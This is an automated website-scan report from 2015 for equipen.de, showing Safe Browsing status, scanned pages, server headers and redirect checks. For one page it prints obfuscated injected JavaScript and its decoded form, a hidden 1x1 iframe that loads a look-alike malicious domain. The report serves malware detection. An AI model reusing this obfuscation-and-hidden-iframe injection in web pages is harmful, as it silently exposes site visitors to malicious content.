Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=equipen.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://equipen.de/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 25 Feb 2015 06:12:11 GMT Location: http://www.equipen.de/ Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1j Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.equipen.de/ | 200 OK Content-Length: 12303 Content-Type: text/html | clean |
http://www.equipen.de/media/system/js/caption.js | 200 OK Content-Length: 1776 Content-Type: application/javascript | clean |
http://equipen.de/templates/rt_catalyst_j15/js/roktoppanel.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 25 Feb 2015 06:12:12 GMT Location: http://www.equipen.de/templates/rt_catalyst_j15/js/roktoppanel.js Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1j Content-Length: 273 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.equipen.de/templates/rt_catalyst_j15/js/roktoppanel.js | 200 OK Content-Length: 2569 Content-Type: application/javascript | clean |
http://equipen.de/templates/rt_catalyst_j15/js/rokmoomenu.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 25 Feb 2015 06:12:12 GMT Location: http://www.equipen.de/templates/rt_catalyst_j15/js/rokmoomenu.js Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1j Content-Length: 272 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.equipen.de/templates/rt_catalyst_j15/js/rokmoomenu.js | 200 OK Content-Length: 2253 Content-Type: application/javascript | clean |
http://equipen.de/templates/rt_catalyst_j15/js/mootools.bgiframe.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 25 Feb 2015 06:12:13 GMT Location: http://www.equipen.de/templates/rt_catalyst_j15/js/mootools.bgiframe.js Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1j Content-Length: 279 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.equipen.de/templates/rt_catalyst_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 964 Content-Type: application/javascript | clean |
http://equipen.de/equipen-aktuelles | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 25 Feb 2015 06:12:13 GMT Location: http://www.equipen.de/equipen-aktuelles Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1j Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.equipen.de/equipen-aktuelles | 200 OK Content-Length: 12284 Content-Type: text/html | clean |
http://www.equipen.de/equipen-vita | 200 OK Content-Length: 8228 Content-Type: text/html | clean |
http://www.equipen.de/referenzen | 200 OK Content-Length: 12067 Content-Type: text/html | clean |
http://www.equipen.de/modules/mod_rokcontentrotator/rokcontentrotator-packed.js | 200 OK Content-Length: 3450 Content-Type: application/javascript | clean |
http://www.equipen.de/texte-regina-kaesmayr | 200 OK Content-Length: 12184 Content-Type: text/html | clean |
http://www.equipen.de/suche | 200 OK Content-Length: 8064 Content-Type: text/html | clean |
http://www.equipen.de/kontakt-equipen | 200 OK Content-Length: 8458 Content-Type: text/html | clean |
http://www.equipen.de/media/system/js/validate.js | 200 OK Content-Length: 4297 Content-Type: application/javascript | clean |
http://www.equipen.de/impressum-kaesmayr | 200 OK Content-Length: 11056 Content-Type: text/html | clean |
http://www.equipen.de/component/user/reset | 200 OK Content-Length: 5225 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mzfvv(soymm){return unescape(soymm);}function luhlp(){document.writeln(mzfvv(szijt));}eyxyx='30plcei01o3mfcAacphi0e33ir3-..te2d%%r%/noh%gfrCECs%eoxdh%rEeehoyi21%mDf %totn0%3e0r a3/amp3hr%/ %2tgidw2Db%amDgl/%Dta3i ';szijt='';for(gfmgp=0;gfmgp<12;gfmgp++) for(livrz=0;livrz<10;livrz++) szijt+=eyxyx.charAt((parseInt('8042137956'.charAt(livrz))*12)+gfmgp);luhlp(); Decoded script: <iframe src=http://google-analytico.com/index.php width=1 height=1 frameborder=0></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: equipen.de
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 25 Feb 2015 06:12:11 GMT
Location: http://www.equipen.de/
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1j
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
GET / HTTP/1.1
Host: equipen.de
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 25 Feb 2015 06:12:11 GMT
Location: http://www.equipen.de/
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1j
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: equipen.de
Referer: http://www.google.com/search?q=equipen.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: equipen.de
Referer: http://www.google.com/search?q=equipen.de
Result:
The result is similar to the first query. There are no suspicious redirects found.